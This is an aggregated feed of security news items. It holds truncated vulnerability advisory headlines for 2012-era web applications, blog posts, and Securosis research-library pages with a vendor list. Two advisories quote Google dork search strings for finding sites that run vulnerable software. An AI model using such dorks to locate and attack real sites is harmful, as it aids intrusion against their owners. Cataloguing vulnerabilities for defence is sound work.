http://securityreason.com/rss/SecurityAlert Topic: ModSecurity 2.6.8 multipart/invalid part ruleset bypass Risk: Medium Text:SEC Consult Vulnerability Lab Security Advisory < 20121017-0 > == title: ModSecurity mul...

==> jCore 1.0pre Cross Site Scripting & SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: jCore 1.0pre Cross Site Scripting & SQL Injection Risk: Medium Text:Advisory ID: HTB23107 Product: jCore Vendor: jcore.net Vulnerable Version(s): 1.0pre and probably prior Tested Version: 1....

==> ATutor AContent 1.2 XSS & Authentication & SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: ATutor AContent 1.2 XSS & Authentication & SQL Injection Risk: Medium Text:Advisory ID: HTB23117 Product: AContent Vendor: ATutor Vulnerable Version(s): 1.2 and probably prior Tested Version: 1.2 V...

==> Subrion CMS 2.2.1 XSS / CSRF / SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: Subrion CMS 2.2.1 XSS / CSRF / SQL Injection Risk: Medium Text:Advisory ID: HTB23113 Product: Subrion CMS Vendor: The Subrion development team Vulnerable Version(s): 2.2.1 and probably pr...

==> Pmsme SQL Injection Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: Pmsme SQL Injection Vulnerability Risk: Medium Text: ## # Title: Powered By: Pmsme SQL Injection Vulnerability # Google Dork: inurl:"page.php?p_id=" Powered By: P...

==> SanaNet Remote Sql Injection Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: SanaNet Remote Sql Injection Vulnerability Risk: Medium Text: Exploit Title : SanaNet Remote Sql Injection Vulnerability Author : N3TD3V!L Discovered By : Sec-Advisor...

==> Legrand-003598 / Bticino-F454 SCS Web Gateway Credentials leaks

http://securityreason.com/rss/SecurityAlert Topic: Legrand-003598 / Bticino-F454 SCS Web Gateway Credentials leaks Risk: Low Text:1. OVERVIEW Credential leaks lead to complete compromise of home automation system 2. BACKGROUND The 2 devices are id...

==> Wordpress Social Discussions Plugin Multiple Vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: Wordpress Social Discussions Plugin Multiple Vulnerabilities Risk: Medium Text:[waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions Plugin == Author: Janek Vind "waraxe"...

==> Oracle WebCenter Sites Multiple vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: Oracle WebCenter Sites Multiple vulnerabilities Risk: Low Text:SEC Consult Vulnerability Lab Security Advisory < 20121017-2 > == title: Multiple vulner...

==> Videosmate Organizer 4.2 Authentication Bypass & Path Disclosure

http://securityreason.com/rss/SecurityAlert Topic: Videosmate Organizer 4.2 Authentication Bypass & Path Disclosure Risk: High Text: Vulnerable software: Videosmate Organizer V 4.2 (all versions) Vendor: http://videosmate.com/ Software License: Commercial...

==> MyBB Profile Albums 0.9 SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: MyBB Profile Albums 0.9 SQL Injection Risk: Medium Text:# Exploit Title: Profile Albums MyBB plugin SQL Injection 0day # Google Dork: inurl:albums.php intext:"powered by Mybb" # Dat...

==> Sisfokol 4.0 Shell Upload

http://securityreason.com/rss/SecurityAlert Topic: Sisfokol 4.0 Shell Upload Risk: High Text:Undergroundthalo Hacking Team - Security Advisory Release Date. 13-Okt-2012 Last Update. - ...

==> TinyWebGallery 1.8.3 Remote Command Execution

http://securityreason.com/rss/SecurityAlert Topic: TinyWebGallery 1.8.3 Remote Command Execution Risk: High Text:TinyWebGallery 1.8.3 Remote Command Execution [] > Date : 05- 01- 2012 [] > Author : ...

==> CakePHP 2.2.0-RC2 XXE Injection

http://securityreason.com/rss/SecurityAlert Topic: CakePHP 2.2.0-RC2 XXE Injection Risk: Medium Text:# Exploit title: CakePHP XXE injection # Date: 01.07.2012 # Software Link: http://www.cakephp.org # Vulnerable version: 2.x ...

==> MangosWeb SQL Injection Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: MangosWeb SQL Injection Vulnerability Risk: Medium Text:EXPLOIT TITLE: MangosWeb SQL Vulnerability DATE: 1/7/2012 BY Hood3dRob1n AFFECTED PRODUCTS: MangosWeb Enhanced Version 3.0.3...

==> Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities Risk: Medium Text:# Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities # Date: 01/06/2012 # Author: Gianluca Brindi...

==> Wordpress Plugin BackWPup 1.6.1 Remote auth bypass

http://securityreason.com/rss/SecurityAlert Topic: Wordpress Plugin BackWPup 1.6.1 Remote auth bypass Risk: High Text:Sense of Security - Security Advisory - SOS-11-003 Release Date. 28-Mar-2011 Last Update. ...

==> Cyber Security Awareness Month

http://securitysumo.wordpress.com/feed/ The Internet Storm Center is offering daily tips on cyber-security, and specifically on incident handling, for the month of October. Check out the link to catch up on the daily tips or submit your own. Posted in Internet Security

==> Apple OS X Root Privilege Vulnerability

http://securitysumo.wordpress.com/feed/ If you are a Mac user, and haven’t seen the latest security vulnerability for OS X yet, Macshadows has an excellent writeup, with a temporary solution. Essentially, you need to open a terminal window and paste the following command: sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent After you press return, you will be prompted for your password. This [...]

==> Portable and Cross-platform Personal Password Manager

http://securitysumo.wordpress.com/feed/ Having to change between two different platforms (Windows and OS X), I wanted a functional password manager that was both portable and cross-platform. KeePass fits this requirement, and even has a Linux port and several other versions, as well. KeePass is open source and free. Download the portable apps version of KeePass here, and the [...]

==> Revision3 Denial of Service Attack

http://securitysumo.wordpress.com/feed/ Revision3 spent the Memorial Day weekend fighting off a denial of service attack. Their blog post summarizes the shocking and angering results. Check it out.

==> I Will Derive …

http://securitysumo.wordpress.com/feed/ One of the funniest videos I have seen in a while (at least from my totally nerd viewpoint):

==> MacBook Pro Hard Drive Replacement

http://securitysumo.wordpress.com/feed/ I upgraded the hard drive in my MacBook Pro today. It went pretty well, but is not really for the easily technological-intimidated! I followed (for the most part) the guide at ifixit. I ran into a few things that their guide didn’t include, so I thought I would add my experience here. First, as you [...]

==> MacBook and MacBook Pro USB Ports

http://securitysumo.wordpress.com/feed/ This week on MacBreak Weekly ( Episode 88 ) one of the hosts was having sound problems with a USB headset. They discussed the problem and one of the other hosts suggested changing the port the headset is on. A short discussion followed and here are the results. The MacBook has two USB ports on [...]

==> VMWare Fusion 2 Beta and Backtrack Wireless

http://securitysumo.wordpress.com/feed/ If you are trying to use VMWare Fusion 2.0 Beta and anything wireless in Backtrack, you might want to wait until the next release. I had all different kinds of trouble getting wireless USB dongles working with the setup. First Kismet would quit because of a TCP error. Then I had several kernel panics. Going [...]

==> What’s on my USB key?

http://securitysumo.wordpress.com/feed/ I’ve gathered many programs for my USB memory stick so I thought I would list them here. Actually, when you get down to it, I have a couple of memory sticks I keep with me most of the time. The first one is an older stick and is only 256 mb. However, it has a [...]

==> Ubuntu 8.04, VMWare Server, Wine and Warcraft, DVD Playback

http://securitysumo.wordpress.com/feed/ I installed the latest Ubuntu (8.04) last weekend and have been playing around with it a bit this week. Wow, is it nice! It is noticeably quicker than my 7.10 install. Of course, I did a complete wipe and reinstall, so that probably has something to do with the speed. I installed VMWare Server as [...]

==> Hardcoreview memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on GIF parsing Applications: Hardcoreview 6.11 (17.10.2012)

==> RSA Adaptive Authentication information leakage

http://securityvulns.com/informer/rss.asp?l=EN Applications: RSA Adaptive Authentication On-Premise 6.0 (17.10.2012)

==> graphicsmagick memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on PNG parsing. Applications: GraphicsMagick 6.7 (17.10.2012)

==> Ezhometech EzServer memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on RTMP AMF request parsing Applications: EzServer 7.0 (17.10.2012)

==> Samsung Kies ActiveX multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Code execution, files modification. Applications: Samsung Kies 2.3 (17.10.2012)

==> Valve Steam multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Buffer overflows, code executions and game engines vulnerabilities can be exploited via steam:// URI handler. (17.10.2012)

==> Visual Tools DVRs multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Information leakage, code execution. (17.10.2012)

==> Data Security

http://securosis.com/feeds/research If you really think about it, technically all of “information security” is “data security”, but the reality is that most of our industry is focused on protecting networks and hosts, and very little is dedicated to protecting the information assets themselves. We here at Securosis prefer the term “Information-Centric Security”, since information is data with value (as opposed to just a bunch of 0’s and 1’s), but we know “data security” is more commonly used, and we’re not about to fight the industry. Since data security encompasses a wide range of tools, technologies, and processes we will highlight top-level management issues on this page, and encourage you to explore the subtopics for more details on database security, DLP, encryption, and other specific areas. We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it’s added to help you find changes more easily. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. The most important piece of work we’ve published on data security is the following: The Business Justification for Data Security. We recommend you download the white paper as it provides a condensed (and professionally edited) review, and here are the links to the individual blog posts to add additional color and commentary: Part 1, part 2, part 3, part 4, part 5, and part 6. (03/09). 2. Tokenization vs. Encryption: Options for compliance. This paper outlines the business uses for tokenization, and examines the tradeoffs between tokenization and traditional encryption. 3. Next, you should read our series of posts on the Data Security Lifecycle which shows how all the various bits and pieces plug in together. Keep in mind that some of these technologies aren’t completely available yet, but the series should give you a good overview of how to take a big picture approach to data security. Start with the Lifecycle, then read the details on the technologies, organized by phase: Part 1, Part 2, Part 3. 4. The general principles of Information-centric/Data Security. 5. Data Verification Issues. 6. Data And Application Security Will Drive Most Security Growth For The Next 3-5 Years. 7. Defensive Security Stack; showing where data security fits in with network, host, and application security (I mention CMF, which is the same as DLP): Data Protection - it’s More than A + B + C. 8. We believe that two existing technologies are evolving into the “core” of data security-Data Loss Prevention and Database Activity Monitoring. The are evolving into what we call Content Monitoring and Protection (DLP, for protecting productivity applications and communications), and Application and Database Monitoring and Protection (DAM, for protecting applications and the data center). We define both technologies in Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection. 9. Continuation of Content Monitoring and Protection: How Data Loss Prevention and Database Activity Monitoring Will Connect. 10. Data classification comes up all the time when discussing data security. Here’s an overview that starts to introduce the idea of practical data classification: The Five Problems With Data Classification, an Introduction To Practical Data Classification. We followed it with a post: Practical Data Classification: Type 1, The Hasty Classification. But the truth is, classification is usually quite problematic,and we don’t recommend manual classification to most enterprise users, as we wrote in: Data Classification is Dead. (We haven’t finished our data classification series yet). 11. Related to data classification, here is a post on Information Governance. 12. Before you start digging in too deep on data security, we recommend you prepare by understanding your users and infrastructure, as we wrote in: Information-Centric Security Tip: Know Your Users and Infrastructure. 13. File Activity Monitoring is an exciting new technology that finally gives us insight into not only how are files are used, but who the heck is accessing them, should be accessing them, and when they violate security policies. We can finally do things like generate alerts when a sales guy starts sucking down all the customer files before moving to a competitor. General Coverage ------------ 1. Sorry, Data Labeling is Not the Same as DRM/ERM 2. Data Labels Suck. 3. Security Requirements for Electronic Medical Records. 4. The Data Breach Triangle. 5. Data Harvesting and Privacy. Presentations --------- These PDF versions of presentations may also be useful, although they don’t include any audio (for any audio/video, please see the next section). * This is the Business Justification for Data Security Presentation that Rich and Adrian provided in February 2009. * This presentation is on Mobile Data Security for the Enterprise. * Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle. * Here’s the current version of Pragmatic Data Security which provides a good, practical process overview with specific implementation details. * Presentation on Data Protection in the Enterprise. Kind of a corporate overview. * Presentation on XML Security. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Since data security is such a broad issue, please see the sub-categories for vendors and tools. If much of this material seems somewhat generic, that’s because data /information-centric security is a fairly high-level topic. We really encourage you to learn about the specifics in the sub-categories in the navigation menu.

==> Upcoming Research

http://securosis.com/feeds/research The Securosis Research Agenda is a dynamic entity. We are constantly revisiting our research plans, so check back often to see what’s in the hopper: * Understanding and Selecting a Web Application Firewall * SIEM 2.0: Replacing Your SIEM Solution * Securing Applications at Scale * Masking for Compliance * Code Security: Security for Developers * Pragmatic Data Security * Network Security Fundamentals * Endpoint Security Fundamentals * Database Security 2.0: Database Security for Relational and Non-relational Systems * Understanding and Implementing Network Segregation * Data Security for the Cloud Some of these papers will be sponsored, some won’t, but all will be released for free under a Creative Commons license on our blog and within the Research Library.

==> All Research Papers

http://securosis.com/feeds/research Application Security Pragmatic WAF Management: Giving Web Apps a Fighting Chance Building a Web Application Security Program Cloud and Virtualization Compliance Tokenization Guidance Tokenization vs. Encryption: Options for Compliance Data Encryption 101: A Pragmatic Approach to PCI Data Security Understanding and Selecting Data Masking Solutions Implementing and Managing a Data Loss Prevention Solution Defending Data on iOS Understanding and Selecting a Database Security Platform Understanding and Selecting a File Activity Monitoring Solution Database Activity Monitoring: Software vs. Appliance The Securosis 2010 Data Security Survey Understanding and Selecting a Tokenization Solution Understanding and Selecting a DLP Solution Understanding and Selecting a Database Encryption or Tokenization Solution Low Hanging Fruit: Quick Wins with Data Loss Prevention (V2.0) Database Assessment Content Discovery Whitepaper Selecting a Database Activity Monitoring Solution Endpoint Security The Endpoint Security Management Buyer’s Guide Endpoint Security Fundamentals Best Practices for Endpoint DLP Evolving Endpoint Malware Detection: Dealing with Advanced and Targeted Attacks Network Security Network-based Malware Detection: Filling the Gaps of AV Applied Network Security Analysis: Moving from Data to Information Fact-Based Network Security: Metrics and the Pursuit of Prioritization Network Security in the Age of Any Computing Understanding and Selecting an Enterprise Firewall Project Quant Malware Analysis Quant Measuring and Optimizing Database Security Operations (DBQuant) Network Security Ops Quant Metrics Model Network Security Operations Quant Report Project Quant Survey Results and Analysis Project Quant Metrics Model Report Security Management Vulnerability Management Evolution: From Tactical Scanner to Strategic Platform Watching the Watchers: Guarding the Keys to the Kingdom (Privileged User Management) Security Management 2.0: Time to Replace Your SIEM? Security Benchmarking: Going Beyond Metrics React Faster and Better: New Approaches for Advanced Incident Response Monitoring up the Stack: Adding Value to SIEM Understanding and Selecting SIEM/Log Management The Business Justification for Data Security

==> Vendor List

http://securosis.com/feeds/research Company Name Exhibitor Type Booth Number Sub-category Category Website 3M Mobile Interactive Solutions Division Exhibitor 2740 Mobile Security Endpoint Security http://solutions.3m.com/wps/portal/3M/en_US/Meetings/Home/ ActivIdentity Exhibitor 1128 Authentication Identity and Access Management http://www.actividentity.com/ Advanced Product Design Exhibitor 340 Advantech Exhibitor 217 AFC Industries Exhibitor 235 Furniture Other http://www.afcindustries.com/ Agiliance Exhibitor 2351 Compliance Security Management and Compliance http://www.agiliance.com/ Akamai Technologies Silver Sponsor 2017 Content Delivery http://www.akamai.com Alert Enterprise Exhibitor 351 Compliance Security Management and Compliance http://www.alertenterprise.com/ Alert Logic Exhibitor 2529 IDS/IPS Network Security http://www.alertlogic.com/ AlgoSec Exhibitor 856 Firewalls Network Security http://www.algosec.com/en/index.php AlienVault Exhibitor 652 SIEM/Log Management Security Management and Compliance http://www.alienvault.com/ Alta Associates Inc. Exhibitor 850 Compliance Security Management and Compliance http://www.altaassociates.com/ AMAX Information Technologies Exhibitor 346 http://www.amaxit.com/ American Portwell Technology, Inc. Exhibitor 628 http://www.portwell.com/ Anakam, an Equifax Company Exhibitor 226 Authentication Identity and Access Management http://www.anakam.com/ Anne Arundel Community College Exhibitor 2728 Education Other http://www.aacc.edu/ Anonymizer, Inc. Exhibitor 2722 Content Security Network Security http://www.anonymizer.com/ Antiy Labs Partner Pavilion 1541 Endpoint Security http://www.antiy.net/ Anue Systems Inc. Exhibitor 2445 Application Testing Application Security http://www.anuesystems.com/ APCON Exhibitor 832 http://www.apcon.com/ Application Security, Inc. Exhibitor 639 Database Security, Vulnerability Assessment Data Security, Security Management and Compliance http://www.appsecinc.com/ AppRiver Exhibitor 1059 Managed Services Email/Web Security http://www.appriver.com/ Approva Exhibitor 428 Compliance Security Management and Compliance http://www.approva.net/ Araknos SRL Unipersonale Exhibitor 347 SIEM/Log Management Security Management and Compliance http://www.araknos.it/en/azienda/azienda.html ArcSight Exhibitor 931 SIEM/Log Management Security Management and Compliance http://www.arcsight.com/ Armorize Technologies Inc. Exhibitor 329 Web Application Assessment Application Security http://www.armorize.com/ Art of Defence GmbH Partner Pavilion 1350 http://www.artofdefence.com/ Art of Defence GmbH Exhibitor 342 Web App Firewalls Application Security http://www.artofdefence.com/ Arxan Technologies Exhibitor 328 Secure Development Application Security http://www.arxan.com/ Astaro Exhibitor 2251 Firewalls, Email Security Gateway, Web Security Gateway Network Security, Email/Web Security http://www.astaro.com/ AT&T Exhibitor 831 http://www.att.com/ atsec information security Partner Pavilion 1350 Compliance Security Management and Compliance http://www.atsec.com/ Authentify, Inc. Exhibitor 1029 Authentication Identity and Access Management http://www.authentify.com/ Authernative, Inc. Exhibitor 550 Authentication Identity and Access Management http://www.authernative.com/ Avenda Systems Exhibitor 318 NAC Network Security http://www.avendasys.com/ Axway Silver Sponsor 2225 http://www.axway.com/ BeCrypt Inc. Exhibitor 2129 Disk Encryption Endpoint Security http://www.becrypt.com/ Beijing LinkTrust Technologies Development Co.,Ltd. Partner Pavilion 1541 Perimeter Defense Network Security http://www.linktrust.com.cn/ Beijing Topsec Science and Technology Co.,Ltd Partner Pavilion 1541 Beijing Venustech Inc. Partner Pavilion 1541 Perimeter Defense Network Security http://english.venustech.com.cn/ Beijing Zhongguancun Overseas Science Park Exhibitor 1541 http://www.zgc.gov.cn/english/ BeyondTrust Corp. Exhibitor 945 Anti-Malware Endpoint Security http://www.beyondtrust.com/ Bit9, Inc. Exhibitor 2621 Anti-Malware Endpoint Security http://www.bit9.com/ Bivio Networks Exhibitor 2133 Content Security Network Security http://www.bivio.net/ Black Box Network Services Exhibitor 2550 http://www.blackbox.com/ BlockMaster AB Exhibitor 2425 Mobile Security Endpoint Security http://www.blockmastersecurity.com/ Blue Coat Systems, Inc. Gold Sponsor 1139 Threat Mgmt, Anti-Malware, Web Security Gateway Network Security, Email/Web Security http://www.bluecoat.com/ BluePoint Security Exhibitor 2559 Cloud Security Virtualization and Cloud http://www.bluepointsecurity.com/ Brainloop Inc. Partner Pavilion 1350 Access Management Data Security http://www.brainloop.com/ BreakingPoint Systems, Inc. Exhibitor 951 Monitoring Network Security http://www.breakingpointsystems.com/ BroadWeb Corporation Partner Pavilion 1541 Perimeter Defense Network Security http://www.broadweb.com/ Bsafe Information Systems Inc. Exhibitor 855 Compliance Security Management and Compliance http://www.bsafesolutions.com/ BSI Partner Pavilion 1344 http://www.bsigroup.com/ C4ISR Journal Exhibitor 2650 Publication Other http://www.c4isrjournal.com CA Technologies Platinum Sponsor 1533 DLP, SIEM/Log Management, Compliance Data Security, Security Management and Compliance http://ca.com/ Capella University Exhibitor 251 Education Other http://www.capella.edu/ Cavium Networks Exhibitor 528 http://www.caviumnetworks.com/ Hardware CCSO.com Exhibitor 2619 http://www.ccso.com/ Disassembler Celestix Networks Exhibitor 852 Perimeter Defense Network Security http://www.celestix.com/ Cenzic, Inc. Exhibitor 332 Application Testing, Application Assessment Application Security http://www.cenzic.com/ Check Point Software Technologies Exhibitor 2317 Firewalls, IDS/IPS, Remote Access, Disk Encryption Network Security, Endpoint Security http://www.checkpoint.com/ Cherry Exhibitor 755 http://www.cherrycorp.com/ Hardware China quality certification certificate authority Partner Pavilion 1541 Compliance Security Management and Compliance http://www.cqc.com.cn/english/ CipherOptics Exhibitor 1923 Encryption Data Security http://www.cipheroptics.com/ Cisco Global Platinum Sponsor 1717 Firewalls, Remote Access, Threat Mgmt, Email Security Gateway, Web Security Gateway, Managed Services Network Security, Email/Web Security http://www.cisco.com/ Cloud Security Alliance Exhibitor 2718 http://www.cloudsecurityalliance.org/ Comodo Group, Inc. Exhibitor 2439 Endpoint Defense Endpoint Security http://www.comodo.com/ CoreTrace Corporation Exhibitor 1963 Anti-Malware Endpoint Security http://www.coretrace.com/ CORISECIO GmbH Partner Pavilion 1350 http://www.corisecio.com/ Coverity Exhibitor 333 Secure Development Application Security http://www.coverity.com/ Critical Watch Exhibitor 950 Compliance Security Management and Compliance http://www.criticalwatch.com/ Cryptography Research, Inc. Exhibitor 2233 http://www.cryptography.com/ Secure dev hardware cv cryptovision GmbH Partner Pavilion 1350 Encryption Data Security http://www.cryptovision.com/ Cyber-Ark Software, Inc. Exhibitor 2045 Authentication Identity and Access Management http://www.cyber-ark.com/ Cybera Exhibitor 752 Compliance Security Management and Compliance http://www.cybera.com/ Cyberoam Exhibitor 723 Perimeter Defense Network Security http://www.cyberoam.com/ Damballa Exhibitor 433 Endpoint Defense Endpoint Security http://www.damballa.com/ Dasient, Inc. Exhibitor 554 Endpoint Defense Endpoint Security http://www.dasient.com/ Dataguise Inc. Exhibitor 645 Database Security Data Security http://www.dataguise.com/ Department of Homeland Security/ US-CERT Exhibitor 457 http://www.us-cert.gov/ DeviceLock Exhibitor 2228 Mobile Security

==> Welcome to Securosis Research

http://securosis.com/feeds/research Download the Coverage Map (PDF) * About Our Research * About the Research Library About Our Research -------------- * Securosis is a new breed of IT research firm focusing on the broad information security and compliance markets. As opposed to relying on big sales forces and high pay walls, we publish our primary research for free on our blog. Yeah, we know, it’s different and scary. But it works. In terms of our primary research model, our focus is to help mid-market IT and security professionals successfully execute on their projects, by providing actionable information to accelerate their progress. It doesn’t mean our research isn’t relevant to large enterprises and government agencies. It just means our primary constituency is someone who wears a security hat as well as a number of other hats on a daily basis. Each week, Securosis publishes a ton of research on what’s happening in the security business, all focused on keeping our readers connected and focused on what’s important, not on the noise. Our weekly research includes: * Securosis FireStarter: Periodically Securosis holds an internal, no-holds-barred research meeting. Each analyst prepares a topic and the other analysts typically rip it to shreds. The end result is a thought generator that challenges our perspectives and demands further discussion. We publish the findings of that research to “stir the pot” a bit and get the echo chamber vibrating. * Securosis Incite: Something we’ve adopted from Security Incite is a hard-hitting summary of the news happening in our industry. Each Wednesday we send out 7-8 links with analysis of what’s happening out there and why it’s important. * Securosis Weekly Summary: Just in case you don’t have anything better to do over the weekend, on Friday we send out a list of things we’ve posted on the blog and also each analyst’s favorite outside post. This keeps you up to date on what we’ve been up to. * Ad Hoc Posts: Yes, the art of blogging is far from dead. During the week, once or twice a day we post something of interest. It could be a more detailed treatment of an announcement, something that’s been bothering us, or part of our primary research (which is always posted to the blog first). In case you are some kind of dinosaur and don’t use an RSS reader, you can sign up for email distribution of our blog posts. Sign up for the Daily Digest or the Weekly Summary.
For each of our coverage areas, we have a defined hierarchy of primary research documents we prepare to ensure deep coverage and actionable advice: * Understanding and Selecting: This series of posts provides the backdrop for each security domain. The research takes a product category perspective and helps readers understand why and how they’d use certain technology, and what is important when evaluating products and offerings. As an example, check out our work on Understanding and Selecting a Database Activity Monitoring Solution. * Building a [Topic] Program: The next level in our research is how to structure a security program to solve a specific problem. This is about more than just figuring out what product to buy, but the underlying processes and techniques required to address a specific problem. You can see our Building a Web Application Security Program for an example of this research. * Project Quant: For a select few coverage areas, we go very deep and actually define very granular process maps and establish metrics to quantify those processes for an aspect of security. We do a public survey to make sure we nail the process map and publish the survey results when we get a statistically significant sample. Check out Project Quant for Patch Management to understand this research.
About the Research Library
Are you tired of having to hunt through screen after screen of crappy search results just to find the few bits of information you need? Or trawl through endless forums and unrelated blog entries just to educate yourself on a new topic? We are too… that’s why we created the Securosis Research Library. The Library is designed to be your first stop when researching a new topic. We’ve collected our best blog posts, white papers, and multimedia materials together in a structure designed to help you find what you need as quickly as possible. Unlike search results or a wiki, we’ve organized the material for each topic in the order we think it will be most useful, rather than by date or some other arbitrary sorting method. We don’t cover every security topic you could think of, but we’re constantly expanding into new areas and filling in coverage that’s lighter than we’d like. Where possible, for technology-related topics we include a list of Free/Open Source and commercial products. We try to keep these lists updated, but if you see something we are missing please email us so we can add it. This is just a list of what’s available in alphabetical order – we aren’t endorsing any particular products. We update the material in the Library on an ongoing basis, and each entry is dated with the last update. If you’d like to keep your own copy, just subscribe to the RSS feed. Since we update the date on each entry when we make changes, your RSS reader should keep a current, local copy of the entire library. Pretty cool, eh? We hope you find it useful, and please email us with any suggestions, errors, or omissions.

==> Endpoint Security

http://securosis.com/feeds/research Stand by for our endpoint security page.

==> Security Management

http://securosis.com/feeds/research Stand by for our security management page.

==> Network Security

http://securosis.com/feeds/research Stand by for our network security page.

==> Cloud and Virtualization

http://securosis.com/feeds/research This is one of the newest areas of our coverage, and although cloud computing and virtualization are distinct technologies, they are very closely related.

==> Compliance

http://securosis.com/feeds/research Papers and Posts ------------ This section covers compliance topics and several general security issues related to compliance with industry and governmental regulations. This is a new section for us, and while we have a ton of information on this topic, we will be evolving how we present the material over time. These articles are strategic in nature, but we will be adding videos and podcasts for hands-on guidance in the coming weeks. General Coverage ------------ 1. It Isn’t Risk Management If You Can’t Lose 2. Visa’s Data Field Encryption 3. Tokenization Will Become the Dominant Payment Transaction Architecture 4. Some Follow-Up Questions for Bob Russo, General Manager of the PCI Council 5. We Know How Breaches Happen 6. New Details, and Lessons, on Heartland Breach 7. Heartland Hackers Caught; Answers and Questions 8. An Open Letter to Robert Carr, CEO of Heartland Payment Systems Presentations --------- * Presentation on Tokenization Guidance for PCI. * Presentation on Data Breaches and Encryption. * Presentation on Data Protection in the Enterprise. This is a corporate overview. * Presentation on Encrypting Mobile Data for the Enterprise. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Please email info@securosis.com if you have any additions or corrections.

==> Database Security

http://securosis.com/feeds/research Database Security is one of the broader topics that Securosis covers. Database servers are highly complex systems – storing, organizing, and managing data for a wide array of applications. Most mid-sized firms have dozens of them, some embedded in desktop applications, while others serve core systems such as web commerce, financials, manufacturing, and inventory management. A Fortune 100 company may have thousands. To address the wide range of offerings and uses, we will cover database security from two different angles. The first is the security of the application itself, and the second is the use and security of the data within the database. Database Vulnerability Assessment (VA), access control & user management, and patch management are all areas where preventative security measures can be applied to a database system. For securing the data itself, we include such topics as Database Activity Monitoring (DAM), auditing, data obfuscation/masking, and database encryption. Technologies like database auditing can be used for either, but we include them in the later category because they provide a transactional view of database usage. We also include some of the database programming guidelines that can help protect databases from SQL injection and other attacks against application logic. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and comments). 1. Understanding and Selecting a Database Security Platform is our new comprehensive database security paper. 2. Database Activity Monitoring research paper remains a reader favorite and can be downloaded here: “Understanding and Selecting a Database Activity Monitoring Solution” white paper. 3. Understanding and Selecting a Database Assessment Solution is now available. We are very happy with this paper. We have even been told by database assessment vendors their product teams learned some tips from this paper, and we think you will too. 4. Our Understanding and Selecting a Database Encryption or Tokenization Solution paper is available. 5. Database Audit Events is a comprehensive list of database events available through native database auditing techniques. 6. Many supporting posts on Database Encryption: Application vs. Database Encryption and Database Encryption: Fact vs. Fiction, Format and Datatype Preserving Encryption, An Introduction to Database Encryption, Database Encryption Misconceptions, Media encryption options for databases,and threat vectors to consider when encrypting data. 7. The 5 laws of Data Masking. Database Security Patch Coverage
1. Oracle Critical Patch Update, July 2009. General Coverage ------------ 1. SQL Injection Prevention 2. Database Audit Performance in this Friday Summary introduction 3. Database Encryption Benchmarking 4. Three Database Roles: Programmer, DBA, Architect 5. Database Security: The Other First Steps 6. Sentrigo and MS SQL Server Vulnerability. 7. Amazon’s SimpleDB. 8. Information on Weak Database Password Checkers. 9. Database Connections and Trust, and databases are not typically set up to validate incoming connections against SQL injection and misused credentials, and this post on recommending Stored Procedures to address SQL Injection attacks 10. Separation of Duties and Functions through roles and programmatic elements, and putting some of the web application code back into the database. 11. Native database primary key generation to avoid data leakage and inference problems, and additional comments on Inference Attacks. 12. Your Top 5 Database Security Resolutions. 13. Posts on separation of duties: Who “Owns” Database Security, and the follow-up: DBAs should NOT own DAM & Database Security. 14. A look at general threats around using External Database Procedures and variants in relational databases. 15. Database Audit Events. 16. Database Security Mass-Market Update and Friday Summary - May 29, 2009 17. Database Patches, Ad Nauseum 18. Acquisitions and Strategy 19. Comments on Oracle’s Acquisition of Sun 20. Oracle CPU for April 2009 21. Netezza buys Tizor 22. More Configuration and Assessment Options. Discusses recent Oracle and Tenable advancements. 23. Policies and Security Products applies to database security as well as other product lines. 24. Oracle Security Update for January 2009. 25. Responding to the SQL Server Zero Day: Security Advisory 961040 includes some recommendations and workarounds. 26. Will Database Security Vendors Disappear? and Rich’s follow-on Database Security Market Challenges considerations for this market segment. 27. Behavioral Monitoring for database security. 28. NitroSecurity acquired RippleTech. 29. Database Monitoring is as big or bigger than DLP. Presentations --------- * Rich’s presentation on Understanding and Selecting a Database Activity Monitoring Solution. (PDF) * Oracle database Security in a Down Economy. (PDF) Podcasts, Webcasts and Multimedia
